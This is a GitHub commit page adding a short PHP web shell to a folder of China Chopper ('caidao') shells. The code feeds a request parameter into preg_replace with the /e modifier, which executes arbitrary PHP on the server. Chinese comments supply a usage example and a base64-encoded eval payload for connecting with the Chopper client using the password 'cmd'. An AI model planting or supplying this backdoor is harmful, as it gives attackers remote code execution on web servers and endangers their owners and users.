Skip to content

Commit

Permalink
Create w01.php
Browse files Browse the repository at this point in the history
  • Loading branch information
tennc authored Jul 16, 2016
1 parent c3b9870 commit 88ad3b3
Showing 1 changed file with 9 additions and 0 deletions.
9 changes: 9 additions & 0 deletions caidao-shell/w01.php
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
<?php
$a = $_REQUEST['id'];
preg_replace('/.*/e',' '.$a,'');
?>

/*
执行方法:?id=eval('phpinfo();');
菜刀连接方法:00.php?id=eval%28base64_decode%28%22QGV2YWwoJF9QT1NUWydjbWQnXSk7%22%29%29; 密码cmd
*/

0 comments on commit 88ad3b3

Please sign in to comment.